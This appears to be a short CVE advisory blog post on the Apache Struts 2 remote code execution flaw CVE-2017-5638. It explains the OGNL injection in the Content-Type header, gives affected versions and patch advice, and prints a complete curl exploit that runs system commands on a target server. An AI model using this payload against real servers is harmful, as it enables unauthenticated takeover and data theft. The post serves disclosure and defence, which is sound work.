Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in an HTTP request to a Struts endpoint, the framework attempts to generate an error message. This process involves an unsafe evaluation of the improperly sanitized header value using Object-Graph Navigation Language (OGNL) expressions. Since OGNL expressions can execute arbitrary Java code on the server, an attacker can craft a Content-Type header containing a malicious OGNL expression. The framework incorrectly interprets this expression during the error-building process, leading to its execution on the server with full application privileges. This allows an unauthenticated remote attacker to achieve complete system compromise, enabling them to run any system command, access or modify data, and take control of the affected server.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-endpoint`

How Exploit:

Craft HTTP request with malicious OGNL in Content-Type header. Exploit triggers during file upload error. OGNL expression executes system commands. Attacker gains remote shell.

Protection from this CVE:

Apply vendor patch immediately. Upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules. Filter malicious Content-Type headers.

Impact:

Complete server compromise. Arbitrary command execution. Data theft and modification. Full application control.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top